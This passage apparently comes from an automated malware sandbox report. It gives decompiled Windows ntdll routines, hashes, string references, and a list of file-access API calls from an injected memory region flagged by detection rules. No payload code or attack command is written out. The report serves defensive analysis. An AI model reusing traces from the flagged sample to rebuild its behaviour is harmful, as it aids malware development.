                                                															_push( &_a4);
                                                															_push(1);
                                                															_t63 = E0095F970( *((intOrPtr*)(_t138 + 0x20)));
                                                															__eflags = _t63;
                                                															if(__eflags >= 0) {
                                                																goto L2;
                                                															} else {
                                                																_push(_t63);
                                                																_t66 = E009A3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                																asm("int3");
                                                																while(1) {
                                                																	_t110 = _t66;
                                                																	__eflags = _t66 - 1;
                                                																	if(_t66 != 1) {
                                                																		break;
                                                																	}
                                                																	_t128 = _t128 | 0xffffffff;
                                                																	_t66 = _t110;
                                                																	asm("lock cmpxchg [ebx], edi");
                                                																	__eflags = _t66 - _t110;
                                                																	if(_t66 != _t110) {
                                                																		continue;
                                                																	} else {
                                                																		_t67 =  *[fs:0x18];
                                                																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                																		return _t67;
                                                																	}
                                                																	goto L58;
                                                																}
                                                																E00985329(_t110, _t138);
                                                																return E009853A5(_t138, 1);
                                                															}
                                                														}
                                                													}
                                                												}
                                                											} else {
                                                												_t56 =  *(_t96 + 0x28);
                                                												goto L3;
                                                											}
                                                										} else {
                                                											_t107 =  *_t119;
                                                											__eflags = _t107;
                                                											if(__eflags > 0) {
                                                												while(1) {
                                                													_t81 = _t107;
                                                													asm("lock cmpxchg [edi], esi");
                                                													__eflags = _t81 - _t107;
                                                													if(_t81 == _t107) {
                                                														break;
                                                													}
                                                													_t107 = _t81;
                                                													__eflags = _t81;
                                                													if(_t81 > 0) {
                                                														continue;
                                                													}
                                                													break;
                                                												}
                                                												_t56 = _a4;
                                                												__eflags = _t107;
                                                											}
                                                											if(__eflags != 0) {
                                                												while(1) {
                                                													L3:
                                                													__eflags = _t56;
                                                													if(_t56 != 0) {
                                                														goto L32;
                                                													}
                                                													_t107 = _t107 | 0xffffffff;
                                                													_t56 = 0;
                                                													asm("lock cmpxchg [edx], ecx");
                                                													__eflags = 0;
                                                													if(0 != 0) {
                                                														continue;
                                                													} else {
                                                														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                														return 1;
                                                													}
                                                													goto L58;
                                                												}
                                                												continue;
                                                											} else {
                                                												goto L40;
                                                											}
                                                										}
                                                										goto L58;
                                                									}
                                                									__eflags = 0;
                                                									return 0;
                                                								} else {
                                                									_t115 =  *(_t96 + 0x28);
                                                									continue;
                                                								}
                                                							} else {
                                                								_t106 =  *_t49;
                                                								__eflags = _t106;
                                                								if(__eflags > 0) {
                                                									while(1) {
                                                										_t93 = _t106;
                                                										asm("lock cmpxchg [edi], esi");
                                                										__eflags = _t93 - _t106;
                                                										if(_t93 == _t106) {
                                                											break;
                                                										}
                                                										_t106 = _t93;
                                                										__eflags = _t93;
                                                										if(_t93 > 0) {
                                                											continue;
                                                										}
                                                										break;
                                                									}
                                                									__eflags = _t106;
                                                								}
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									goto L23;
                                                								}
                                                							}
                                                						}
                                                						goto L58;
                                                					}
                                                					_t84 = _t115;
                                                					asm("lock cmpxchg [esi], ecx");
                                                					__eflags = _t84 - _t115;
                                                					if(_t84 != _t115) {
                                                						_t115 = _t84;
                                                						goto L7;
                                                					} else {
                                                						return 1;
                                                					}
                                                				}
                                                				L58:
                                                			}

                                                0x009a055a
                                                0x009a055d
                                                0x009a0563
                                                0x009a0566
                                                0x009a05d8
                                                0x009a05e2
                                                0x009a05e5
                                                0x00000000
                                                0x009a05e7
                                                0x009a05e7
                                                0x009a05ea
                                                0x009a05f3
                                                0x009a05f3
                                                0x009a0568
                                                0x009a0568
                                                0x009a0568
                                                0x009a0569
                                                0x009a0569
                                                0x009a0569
                                                0x009a056b
                                                0x00000000
                                                0x00000000
                                                0x009c217f
                                                0x009c2183
                                                0x009c225b
                                                0x009c225f
                                                0x009c2189
                                                0x009c218c
                                                0x009c218f
                                                0x009c2194
                                                0x009c2199
                                                0x009c219d
                                                0x009c21a0
                                                0x009c21a2
                                                0x009c21ce
                                                0x009c21ce
                                                0x009c21ce
                                                0x009c21d0
                                                0x009c21d6
                                                0x009c21de
                                                0x009c21e2
                                                0x009c21e8
                                                0x009c21e9
                                                0x009c21ec
                                                0x009c21f1
                                                0x009c21f6
                                                0x00000000
                                                0x00000000
                                                0x009c21f8
                                                0x009c21fb
                                                0x009c2206
                                                0x009c220b
                                                0x009c220c
                                                0x009c2217
                                                0x009c2226
                                                0x009c222b
                                                0x009c222c
                                                0x009c222f
                                                0x009c2232
                                                0x009c2235
                                                0x009c2235
                                                0x009c223a
                                                0x009c223f
                                                0x009c2241
                                                0x009c2243
                                                0x009c2248
                                                0x009c2248
                                                0x009c224d
                                                0x009c224f
                                                0x009c2262
                                                0x009c2263
                                                0x009c2268
                                                0x009c2269
                                                0x009c2269
                                                0x009c2269
                                                0x009c226d
                                                0x00000000
                                                0x00000000
                                                0x009c2276
                                                0x009c2279
                                                0x009c227e
                                                0x009c2283
                                                0x009c2287
                                                0x009c228a
                                                0x009c228d
                                                0x009c228f
                                                0x009c22bc
                                                0x009c22bc
                                                0x009c22bc
                                                0x009c22be
                                                0x009c22c4
                                                0x009c22cc
                                                0x009c22d0
                                                0x009c22d6
                                                0x009c22d7
                                                0x009c22da
                                                0x009c22df
                                                0x009c22e4
                                                0x00000000
                                                0x00000000
                                                0x009c22e6
                                                0x009c22e9
                                                0x009c22f4
                                                0x009c22f9
                                                0x009c22fa
                                                0x009c2305
                                                0x009c2314
                                                0x009c2319
                                                0x009c231a
                                                0x009c231d
                                                0x009c2320
                                                0x009c2323
                                                0x009c2323
                                                0x009c2328
                                                0x009c232d
                                                0x009c232f
                                                0x009c2331
                                                0x009c2336
                                                0x009c2336
                                                0x009c233b
                                                0x009c233d
                                                0x009c2350
                                                0x009c2351
                                                0x009c2356
                                                0x009c2359
                                                0x009c2359
                                                0x009c235b
                                                0x009c235d
                                                0x00985367
                                                0x0098536b
                                                0x00985372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009c2363
                                                0x009c2363
                                                0x009c2369
                                                0x009c236a
                                                0x009c236c
                                                0x009c2371
                                                0x009c2373
                                                0x00000000
                                                0x009c2379
                                                0x009c2379
                                                0x009c237a
                                                0x009c237f
                                                0x009c237f
                                                0x009c2385
                                                0x009c2386
                                                0x009c2389
                                                0x009c238e
                                                0x009c2390
                                                0x00985378
                                                0x0098537c
                                                0x009c2396
                                                0x009c2396
                                                0x009c2397
                                                0x009c239c
                                                0x009c23a2
                                                0x009c23a3
                                                0x009c23a6
                                                0x009c23ab
                                                0x009c23ad
                                                0x00000000
                                                0x009c23b3
                                                0x009c23b3
                                                0x009c23b4
                                                0x009c23b9
                                                0x009c23ba
                                                0x009c23ba
                                                0x009c23bc
                                                0x009c23bf
                                                0x00000000
                                                0x00000000
                                                0x009b9153
                                                0x009b9158
                                                0x009b915a
                                                0x009b915e
                                                0x009b9160
                                                0x00000000
                                                0x009b9166
                                                0x009b9166
                                                0x009b9171
                                                0x009b9176
                                                0x009b9176
                                                0x00000000
                                                0x009b9160
                                                0x009c23c6
                                                0x009c23d7
                                                0x009c23d7
                                                0x009c23ad
                                                0x009c2390
                                                0x009c2373
                                                0x009c233f
                                                0x009c233f
                                                0x00000000
                                                0x009c233f
                                                0x009c2291
                                                0x009c2291
                                                0x009c2293
                                                0x009c2295
                                                0x009c229a
                                                0x009c22a1
                                                0x009c22a3
                                                0x009c22a7
                                                0x009c22a9
                                                0x00000000
                                                0x00000000
                                                0x009c22ab
                                                0x009c22ad
                                                0x009c22af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009c22af
                                                0x009c22b1
                                                0x009c22b4
                                                0x009c22b4
                                                0x009c22b6
                                                0x009853be
                                                0x009853be
                                                0x009853be
                                                0x009853c0
                                                0x00000000
                                                0x00000000
                                                0x009853cb
                                                0x009853ce
                                                0x009853d0
                                                0x009853d4
                                                0x009853d6
                                                0x00000000
                                                0x009853d8
                                                0x009853e3
                                                0x009853ea
                                                0x009853ea
                                                0x00000000
                                                0x009853d6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009c22b6
                                                0x00000000
                                                0x009c228f
                                                0x009c2349
                                                0x009c234d
                                                0x009c2251
                                                0x009c2251
                                                0x00000000
                                                0x009c2251
                                                0x009c21a4
                                                0x009c21a4
                                                0x009c21a6
                                                0x009c21a8
                                                0x009c21ac
                                                0x009c21b6
                                                0x009c21b8
                                                0x009c21bc
                                                0x009c21be
                                                0x00000000
                                                0x00000000
                                                0x009c21c0
                                                0x009c21c2
                                                0x009c21c4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009c21c4
                                                0x009c21c6
                                                0x009c21c6
                                                0x009c21c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009c21c8
                                                0x009c21a2
                                                0x00000000
                                                0x009c2183
                                                0x009a057b
                                                0x009a057d
                                                0x009a0581
                                                0x009a0583
                                                0x009c2178
                                                0x00000000
                                                0x009a0589
                                                0x009a058f
                                                0x009a058f
                                                0x009a0583
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C2206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: 2fdd6a20e395bda0fb9ae5ae99df20b9864aa2bbd5de9e0ee5ed67ccf3c25f90
                                                • Instruction ID: ee8ff7339e75f96c011b71acd0b669d87ac322bb7a2df781e91eaa2576f67882
                                                • Opcode Fuzzy Hash: 2fdd6a20e395bda0fb9ae5ae99df20b9864aa2bbd5de9e0ee5ed67ccf3c25f90
                                                • Instruction Fuzzy Hash: DC514631B442016FEB15CB19CC82FA633ADAFD5720F25822DFD59DB286DA35EC418B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E009A14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                				signed int _v8;
                                                				char _v10;
                                                				char _v140;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t24;
                                                				void* _t26;
                                                				signed int _t29;
                                                				signed int _t34;
                                                				signed int _t40;
                                                				intOrPtr _t45;
                                                				void* _t51;
                                                				intOrPtr* _t52;
                                                				void* _t54;
                                                				signed int _t57;
                                                				void* _t58;
                                                
                                                				_t51 = __edx;
                                                				_t24 =  *0xa42088; // 0x75f650f4
                                                				_v8 = _t24 ^ _t57;
                                                				_t45 = _a16;
                                                				_t53 = _a4;
                                                				_t52 = _a20;
                                                				if(_a4 == 0 || _t52 == 0) {
                                                					L10:
                                                					_t26 = 0xc000000d;
                                                				} else {
                                                					if(_t45 == 0) {
                                                						if( *_t52 == _t45) {
                                                							goto L3;
                                                						} else {
                                                							goto L10;
                                                						}
                                                					} else {
                                                						L3:
                                                						_t28 =  &_v140;
                                                						if(_a12 != 0) {
                                                							_push("[");
                                                							_push(0x41);
                                                							_push( &_v140);
                                                							_t29 = E00997707();
                                                							_t58 = _t58 + 0xc;
                                                							_t28 = _t57 + _t29 * 2 - 0x88;
                                                						}
                                                						_t54 = E009A13CB(_t53, _t28);
                                                						if(_a8 != 0) {
                                                							_t34 = E00997707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                							_t58 = _t58 + 0x10;
                                                							_t54 = _t54 + _t34 * 2;
                                                						}
                                                						if(_a12 != 0) {
                                                							_t40 = E00997707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                							_t58 = _t58 + 0x10;
                                                							_t54 = _t54 + _t40 * 2;
                                                						}
                                                						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                						 *_t52 = _t53;
                                                						if( *_t52 < _t53) {
                                                							goto L10;
                                                						} else {
                                                							E00962340(_t45,  &_v140, _t53 + _t53);
                                                							_t26 = 0;
                                                						}
                                                					}
                                                				}
                                                				return E0096E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                			}

                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 009CEA22
                                                  • Part of subcall function 009A13CB: ___swprintf_l.LIBCMT ref: 009A146B
                                                  • Part of subcall function 009A13CB: ___swprintf_l.LIBCMT ref: 009A1490
                                                • ___swprintf_l.LIBCMT ref: 009A156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: bf408b586b2424854d2e25ff2059d0e630e318ce4dc58a086a32b8496d037699
                                                • Instruction ID: 4b0e5b8423cbd801a9ffbf5b61b07a893185394e5eef05ecac15c206bb4a008e
                                                • Opcode Fuzzy Hash: bf408b586b2424854d2e25ff2059d0e630e318ce4dc58a086a32b8496d037699
                                                • Instruction Fuzzy Hash: F0219172D00219AFCF21DE98CC41BEAB3ACAB95710F444565FC46D3140DB74EA588BE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C22F4
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009C22FC
                                                • RTL: Resource at %p, xrefs: 009C230B
                                                • RTL: Re-Waiting, xrefs: 009C2328
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: 4fb87f34b410594d901478e7fd91d4e8e9d8e5739116e207f172a2db5380423f
                                                • Instruction ID: b041027db05407bc7f7ad35f2c5f81615f61308bca5b523902f5e54c67f0ff89
                                                • Opcode Fuzzy Hash: 4fb87f34b410594d901478e7fd91d4e8e9d8e5739116e207f172a2db5380423f
                                                • Instruction Fuzzy Hash: AE515671A00701ABEB15EB28CC81FA7339CAFD5760F11422AFD19CB281EA74EC4587E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009C24BD
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 009C248D
                                                • RTL: Re-Waiting, xrefs: 009C24FA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: ea6d2248df0375a06848bee3cf2ecb441571b865c640ec386e8ab47a86b1c9d5
                                                • Instruction ID: 16abb3a5f17846f9f0263899611f7746e4d1ad7d111184efa7103692e4948e63
                                                • Opcode Fuzzy Hash: ea6d2248df0375a06848bee3cf2ecb441571b865c640ec386e8ab47a86b1c9d5
                                                • Instruction Fuzzy Hash: D041E670A00204ABD724EFA9CC99FAB77A8EFC5720F208A19F5559B3D1D734E94187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: 37ec77aa07be603a98bbf8bb6b77a1d0c5034cb92a9936484ba851af09907f86
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: 41919F72D0420AEBDF24CF9CC855BEEB7B8EF55305F24847AD452E61A2E7304A41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00124BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00124BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0012A3AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: d56f46eb1be5e4239b1e6c94dcce05e592ab85c52cadf44414a321a4209374a5
                                                • Instruction ID: c69e2a78efcb8d8df0d032b5203653261d21c16f534b8f91aff64f9fc2e8288f
                                                • Opcode Fuzzy Hash: d56f46eb1be5e4239b1e6c94dcce05e592ab85c52cadf44414a321a4209374a5
                                                • Instruction Fuzzy Hash: E611E2B2210009AFCB08DFA8DC84CEB77ADFF8C754B258649FA1D93201D634E8118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00124BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00124BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0012A3AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: 4c2bde7896b3b1e82645d29dfe9f3c6dfed909482ed5db29a8f1acbe2dcc83cb
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: 61F0BDB2200208AFCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(00124D72,5EB65239,FFFFFFFF,00124A31,?,?,00124D72,?,00124A31,FFFFFFFF,5EB65239,00124D72,?,00000000), ref: 0012A455
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1adc704855daf59fd18c7978f78fde3c6a462d23d04938e041fefc5bd728430c
                                                • Instruction ID: 659882988b38adc24605493d09c624b967da050be95a1080e685743d4410aed8
                                                • Opcode Fuzzy Hash: 1adc704855daf59fd18c7978f78fde3c6a462d23d04938e041fefc5bd728430c
                                                • Instruction Fuzzy Hash: 0BF07FB6200118AFCB14DF99DC81EEB77A9AF8C754F158248BA1DA7241DA34E911CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(00124D72,5EB65239,FFFFFFFF,00124A31,?,?,00124D72,?,00124A31,FFFFFFFF,5EB65239,00124D72,?,00000000), ref: 0012A455
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: 0eadc11b6853a637530a86095667742cd932d7106f8b282a7e711f140cfac3cd
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: 5EF0B7B2200208AFCB14DF99DC81EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL(00124D50,?,?,00124D50,00000000,FFFFFFFF), ref: 0012A4B5
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: 87556880b08f049c8d08fad1a1f5ea2fac0fe91440d2f59c96df67fc567a0433
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: A7D012752002146BD710EB98DC45E97775CEF44B50F154455BA185B242C530F51086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL(00124D50,?,?,00124D50,00000000,FFFFFFFF), ref: 0012A4B5
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: c44058b855ac9d5382c1e7bb39213284127d91912d72c7fd6612ddceb40b3234
                                                • Instruction ID: afe4d3d136cbdac215298d1728e6002a206bc9f3ca0cc3e6a6c6d76840235fca
                                                • Opcode Fuzzy Hash: c44058b855ac9d5382c1e7bb39213284127d91912d72c7fd6612ddceb40b3234
                                                • Instruction Fuzzy Hash: 43D02BA950D2C08FDB10FBB4F4D40CABB60EF9061872459DEE4B407647D27592159391
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
